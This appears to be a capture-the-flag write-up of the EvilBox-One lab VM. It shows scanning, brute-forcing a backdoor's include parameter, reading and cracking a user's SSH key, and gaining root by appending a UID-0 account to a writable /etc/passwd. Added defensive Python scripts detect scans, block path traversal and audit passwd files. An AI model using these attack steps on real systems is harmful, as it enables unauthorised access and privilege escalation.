vulnhub6

This post was last updated 572 days ago; the information in it may no longer be current.

Target machine: https://download.vulnhub.com/evilbox/EvilBox---One.ova

Preparation

Start by installing Kali's wordlist collection:

sudo apt install seclists

Or just type seclists; the system asks whether to install it, and entering y installs it automatically.


The default location is /usr/share/wordlists, which holds a large number of wordlists of every kind.


gobuster is installed the same way.

Information gathering

Use nmap to find the open ports:

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap --min-rate 10000 -p- 192.168.142.129
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B5:81:B9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

Use nmap to get service details for the open ports and an operating-system guess:

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ sudo nmap -sV -sT -O -p 22,80 192.168.142.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 11:12 CST
Nmap scan report for 192.168.142.129
Host is up (0.00022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:B5:81:B9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

fscan scan

┌──(kali㉿kali)-[~/Desktop/Tools/fscan]
└─$ ./fscan_amd64 -h 192.168.142.129

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.142.129   is alive
[*] Icmp alive hosts len is: 1
192.168.142.129:22 open
192.168.142.129:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://192.168.142.129   code:200 len:10701  title:Apache2 Debian Default Page: It works

Only port 80 offers anything to work with, so I went straight to the website and started enumerating directories:

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://192.168.142.129/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,asp,jsp,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.142.129/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,asp,jsp,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

Three results came back:

/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 319] [--> http://192.168.142.129/secret/]
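A scan like the one above leaves a very recognisable trail in the web server's access log: one client, hundreds of thousands of requests, almost all of them 404s, and (unless the scanner changes its User-Agent) a tool name in the UA field. The following script is an added example and is not part of the original write-up or of gobuster; it parses Apache combined-format log lines, flags clients that look like directory brute-forcers, and lists the paths they actually found so a responder knows what was exposed. The log lines and the scanner User-Agent list are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample in Apache "combined" log format; these lines are made up for the
# example and are not from the EvilBox machine.
SAMPLE_LOG = """\
192.168.142.1 - - [08/Oct/2023:11:20:01 +0800] "GET /index.html HTTP/1.1" 200 10701 "-" "gobuster/3.6"
192.168.142.1 - - [08/Oct/2023:11:20:01 +0800] "GET /admin.php HTTP/1.1" 404 280 "-" "gobuster/3.6"
192.168.142.1 - - [08/Oct/2023:11:20:01 +0800] "GET /backup.txt HTTP/1.1" 404 280 "-" "gobuster/3.6"
192.168.142.1 - - [08/Oct/2023:11:20:02 +0800] "GET /secret HTTP/1.1" 301 319 "-" "gobuster/3.6"
192.168.142.1 - - [08/Oct/2023:11:20:02 +0800] "GET /test.jsp HTTP/1.1" 404 280 "-" "gobuster/3.6"
192.168.142.1 - - [08/Oct/2023:11:20:02 +0800] "GET /login.html HTTP/1.1" 404 280 "-" "gobuster/3.6"
192.168.142.50 - - [08/Oct/2023:11:21:10 +0800] "GET / HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
192.168.142.50 - - [08/Oct/2023:11:21:12 +0800] "GET /favicon.ico HTTP/1.1" 404 280 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed list of well-known enumeration tools; extend it for your environment.
SCANNER_UA_MARKERS = ("gobuster", "dirbuster", "dirb", "ffuf", "feroxbuster", "nikto")


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_enumeration(log_text, min_404=20, ua_markers=SCANNER_UA_MARKERS):
    """Flag clients that look like directory brute-forcers.

    A client is flagged when it produced at least `min_404` 404 responses, or when its
    User-Agent names a known scanner. For each flagged client the paths that did NOT
    return 404 are listed as well: those are the resources the scan actually discovered,
    which is what a responder needs to review first.
    """
    per_ip = defaultdict(lambda: {"404": 0, "paths": set(), "scanner_ua": False, "hits": []})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        st = per_ip[rec["ip"]]
        st["paths"].add(rec["path"])
        if rec["status"] == "404":
            st["404"] += 1
        else:
            st["hits"].append(rec["path"])
        if any(marker in rec["ua"].lower() for marker in ua_markers):
            st["scanner_ua"] = True

    flagged = {}
    for ip, st in per_ip.items():
        if st["404"] >= min_404 or st["scanner_ua"]:
            flagged[ip] = {
                "404": st["404"],
                "distinct_paths": len(st["paths"]),
                "scanner_ua": st["scanner_ua"],
                "hits": st["hits"],
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

The 404 rate is the primary signal; the User-Agent check is a bonus, because a scanner's UA can be set to anything. In the sample the scanning client is caught by its UA with only four 404s, and with the UA check disabled it is still caught once min_404 is lowered to four.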

index.html is the default Apache page.

Contents of robots.txt:

[screenshot: robots.txt contents]

Note it down; it may turn out to be a username or password needed later.

Next, brute-force the second-level directory /secret.


That turned up evil.php, which looks like a backdoor file. It returns nothing on its own, so its parameter name has to be brute-forced.

The backdoor type also has to be guessed (eval, system or include).

Brute-forcing an eval parameter


No result.


Brute-forcing a system parameter


No result.


Brute-forcing an include parameter


This succeeded: the parameter is command.


Approaches once you have arbitrary file read:

1. Read /etc/passwd, or, if a username is already known, the shell history in that user's home directory.
2. Look at /root/.ssh/id_rsa or /home/user/.ssh/id_rsa for a private key, and at the public-key file `authorized_keys`.
3. Write a file through a PHP pseudo-protocol:
   * Write: php://filter/write.base64-decode/resource=filename&txt=base64 of the content to write
   * If the write succeeded the file can be viewed directly; otherwise it did not work.
4. Log file inclusion to get a shell.
5. PHP filter chains (filterchains php gen).
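Everything in the list above works because the include parameter hands a user-controlled string straight to the file system. The function below is an added example, not code from the write-up or from the target machine: it shows the resolution check such a parameter needs before touching a file. It rejects NUL bytes, stream wrappers such as php://, absolute paths, anything that escapes the document root after `..` and symlink normalisation, and extensions outside an allowlist. The document root, file name and probe inputs are all constructed in a temporary directory.

```python
import os
import tempfile

ALLOWED_EXTENSIONS = (".txt", ".html")  # assumed allowlist for this example


def resolve_under(base_dir, requested, allowed_exts=ALLOWED_EXTENSIONS):
    """Map a user-supplied file name to a path strictly inside base_dir, or raise ValueError.

    This is the check an include()/readfile()-style parameter lacks when it can be pointed
    at /etc/passwd or at php:// wrappers: every rejection reason is returned as the
    exception message so callers can log why a request was refused.
    """
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    lowered = requested.lower()
    if "://" in lowered or lowered.startswith(("php:", "data:", "file:", "expect:", "phar:")):
        raise ValueError("stream wrappers are not allowed")
    if os.path.isabs(requested):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath() has already collapsed '..' and followed symlinks, so a prefix test is sound here.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    if os.path.splitext(candidate)[1].lower() not in allowed_exts:
        raise ValueError("extension not allowed")
    if not os.path.isfile(candidate):
        raise ValueError("no such file")
    return candidate


def check_inputs(base_dir, inputs):
    """Return {input: "ok" or rejection reason} for each candidate name."""
    results = {}
    for name in inputs:
        try:
            resolve_under(base_dir, name)
            results[name] = "ok"
        except ValueError as err:
            results[name] = str(err)
    return results


def demo():
    """Constructed demo: a throwaway web root with one legitimate file, probed with the
    classic file-read inputs. Returns the verdict for each input."""
    with tempfile.TemporaryDirectory() as root:
        docroot = os.path.join(root, "html", "secret")
        os.makedirs(docroot)
        with open(os.path.join(docroot, "notes.txt"), "w") as fh:
            fh.write("constructed sample content\n")
        return check_inputs(docroot, [
            "notes.txt",
            "../../../../etc/passwd",
            "/etc/passwd",
            "php://filter/convert.base64-encode/resource=notes.txt",
            "notes.txt\x00.php",
            "evil.php",
            "missing.txt",
        ])


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(repr(name), "->", verdict)
```

The order of the checks matters: the NUL test runs first because path functions on some platforms raise on embedded NULs, and the wrapper test runs before realpath() because "php://filter/..." is a perfectly valid-looking relative path to the file system layer.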

Use the following command to see how SSH login is configured:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh mowree@192.168.142.129 -v


It shows that both public-key and password login are permitted, and only the second approach turned out to be workable.

Paths of the SSH key files:

Public key: .ssh/authorized_keys
Private key: .ssh/id_rsa

There are two ways to go about reading them:

1. Read root's, which gets you straight to the goal (in most cases the permissions are not sufficient).

2. Read the user's files directly; the permissions are usually sufficient for that.

Here only the user's files could be read. Both the private key (id_rsa) and the public key (authorized_keys) were retrieved (shown as screenshots in the original post).

Save them into your own SSH key files and then try to log in. The key cannot be used directly here, though: SSH still prompts for a password. There are two possible reasons:

1. The server does not have private-key login enabled.
2. A passphrase was set when the key was generated, so a password is still required at login.

Getting a shell

So the next step is to brute-force the passphrase set on the key, using the john tool that ships with Kali.

john is strict about the format of its input, so a script is needed to convert the key into the format it expects. The script lives at /usr/share/john/ssh2john.py.


Run the script:

python ssh2john.py /root/.ssh/id_rsa > /root/.ssh/hash

Then john can crack the result.


The passphrase is unicorn.

Before logging in, remember to set id_rsa to mode 600:

chmod 600 id_rsa

Then log in with the private key.
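Two properties of the key file decide how this step goes: whether the private key is passphrase-protected at all (and with which cipher and KDF, which is what determines how fast an offline guess like the john run above proceeds), and whether the file mode is 0600, which ssh refuses to work without. The script below is an added example, not part of the original post or of OpenSSH; it parses both the modern openssh-key-v1 container and the legacy PEM form to report those facts, and checks the file mode. The key headers it inspects are constructed and carry no real key material.

```python
import base64
import os
import stat
import struct
import tempfile


def _read_string(buf, offset):
    """Read one SSH wire-format string (uint32 big-endian length + bytes) from buf at offset."""
    (length,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    return buf[offset:offset + length], offset + length


def inspect_private_key(pem_text):
    """Report whether an OpenSSH private key is passphrase-protected and how.

    The 'openssh-key-v1' container names its cipher and KDF in plaintext header fields
    ("none" means unencrypted). The legacy PKCS#1 PEM form signals encryption with
    RFC 1421 'Proc-Type: 4,ENCRYPTED' and 'DEK-Info' headers.
    """
    lines = [ln.strip() for ln in pem_text.strip().splitlines() if ln.strip()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-framed key")
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, _ = _read_string(blob, off)
        cipher, kdf = cipher.decode(), kdf.decode()
        return {"format": "openssh-v1", "encrypted": cipher != "none", "cipher": cipher, "kdf": kdf}
    headers = [ln for ln in lines[1:-1] if ": " in ln]  # base64 lines never contain ': '
    encrypted = any(h.startswith("Proc-Type: 4,ENCRYPTED") for h in headers)
    dek = next((h.split(":", 1)[1].strip() for h in headers if h.startswith("DEK-Info:")), "")
    cipher = dek.split(",")[0] if dek else "none"
    # Legacy PEM derives the key with OpenSSL's EVP_BytesToKey (a single MD5 round), a weak
    # KDF; the bcrypt KDF of the v1 container is what makes modern keys slow to guess offline.
    return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "EVP_BytesToKey(md5)" if encrypted else "none"}


def key_file_mode_ok(path):
    """True when the key is readable/writable only by its owner (0600 or stricter), as ssh demands."""
    return stat.S_IMODE(os.stat(path).st_mode) & 0o077 == 0


def _constructed_v1_header(cipher, kdf):
    """Build only the header fields of an openssh-key-v1 blob (constructed; no key material)."""
    def wire(b):
        return struct.pack(">I", len(b)) + b
    body = b"openssh-key-v1\x00" + wire(cipher) + wire(kdf) + wire(b"") + struct.pack(">I", 1)
    b64 = base64.b64encode(body).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_V1_ENCRYPTED = _constructed_v1_header(b"aes256-ctr", b"bcrypt")
SAMPLE_V1_PLAIN = _constructed_v1_header(b"none", b"none")
SAMPLE_PEM_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

bm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""


def demo_mode_check():
    """Constructed demo: a key file at 0644 fails the check, then passes after chmod 600."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        before = key_file_mode_ok(path)
        os.chmod(path, 0o600)  # the `chmod 600 id_rsa` step ssh insists on
        after = key_file_mode_ok(path)
    finally:
        os.unlink(path)
    return before, after


if __name__ == "__main__":
    for sample in (SAMPLE_V1_ENCRYPTED, SAMPLE_V1_PLAIN, SAMPLE_PEM_ENCRYPTED):
        print(inspect_private_key(sample))
    print("mode check before/after chmod 600:", demo_mode_check())
```

A key whose report says encrypted: False is exposed outright if the file is ever read, as it was on this box; an encrypted one is only as strong as its passphrase and KDF, which is why a dictionary word like the one found above falls to john in seconds.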


Privilege escalation

SUID escalation:

mowree@EvilBoxOne:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su

Nothing exploitable among the SUID binaries.

Looking for kernel vulnerabilities (Metasploit's local exploit suggester):

 #  Name                                           Potentially Vulnerable?  Check Result
 -  ----                                           -----------------------  ------------
 1  exploit/linux/local/cve_2022_0995_watch_queue  Yes                      The target appears to be vulnerable.
 2  exploit/linux/local/su_login                   Yes                      The target appears to be vulnerable.
 3  exploit/linux/local/vmwgfx_fd_priv_esc         Yes                      The target appears to be vulnerable. vmwgfx installed

Three candidates, but none of them worked.

Looking for writable files:

find / -writable 2>/dev/null | grep -v run | grep -v proc | grep -v sys | grep -v var | grep -v usr | grep -v /dev | grep -v apache2 | grep -v ssl


/etc/passwd turns out to be writable, so escalate by appending a new account with UID 0.

mowree@EvilBoxOne:/tmp$ echo 'root2:$1$u1UR7D3z$Zp7IvFndtV5XH/tYozXi6.:0:0:root:/root:/bin/sh' >> /etc/passwd
mowree@EvilBoxOne:/tmp$ su root2
Contraseña: id
su: Fallo de autenticación
mowree@EvilBoxOne:/tmp$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:/tmp$ su root2
Contraseña:
# id
uid=0(root) gid=0(root) grupos=0(root)
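The escalation above leaves two artefacts any host audit should catch: a second UID-0 account, and a password hash sitting in /etc/passwd rather than in /etc/shadow (on a modern system every passwd entry should carry `x` there). The root cause, a writable /etc/passwd, is a third. The script below is an added example and not code from the write-up or from any Linux distribution; it parses passwd(5) content, reports those three conditions, and checks the file's mode and owner. The passwd content is constructed, with a placeholder in the hash field.

```python
import os
import stat
import tempfile

# Constructed sample: a Debian-style /etc/passwd with one appended rogue UID-0 entry that
# carries a hash in the password field. The hash is a placeholder, not a real one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
root2:$1$PLACEHOLDER$notarealhash000000000:0:0:root:/root:/bin/sh
"""


def parse_passwd(text):
    """Split passwd(5) lines into dicts; malformed lines are kept with a 'malformed' key."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            entries.append({"line": lineno, "malformed": line})
            continue
        name, pw, uid, gid, gecos, home, shell = parts
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return human-readable findings for the contents of a passwd file."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry {e['malformed']!r}")
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: non-root account '{e['name']}' has uid 0")
        pw = e["pw"]
        if pw == "":
            findings.append(f"line {e['line']}: account '{e['name']}' has an empty password field")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append(f"line {e['line']}: account '{e['name']}' carries a password hash "
                            f"in /etc/passwd instead of /etc/shadow")
    return findings


def audit_passwd_file_mode(path):
    """Findings about who may modify the file; a writable /etc/passwd is the bug abused above."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path} is world-writable (mode {oct(mode)})")
    elif mode & stat.S_IWGRP:
        findings.append(f"{path} is group-writable (mode {oct(mode)})")
    if st.st_uid != 0:
        findings.append(f"{path} is not owned by root (uid {st.st_uid})")
    return findings


def demo_file_mode():
    """Constructed demo: the same file audited at 0666 and then at the expected 0644."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o666)
        loose = audit_passwd_file_mode(path)
        os.chmod(path, 0o644)
        tight = audit_passwd_file_mode(path)
    finally:
        os.unlink(path)
    return loose, tight


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f)
    print(demo_file_mode())
```

Run against the real file with audit_passwd(open("/etc/passwd").read()) and audit_passwd_file_mode("/etc/passwd"); on a healthy Debian host both return empty lists. Note that the shell session above also shows the mistake of typing id at the password prompt, which produces the "Fallo de autenticación" line before the second, successful su.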

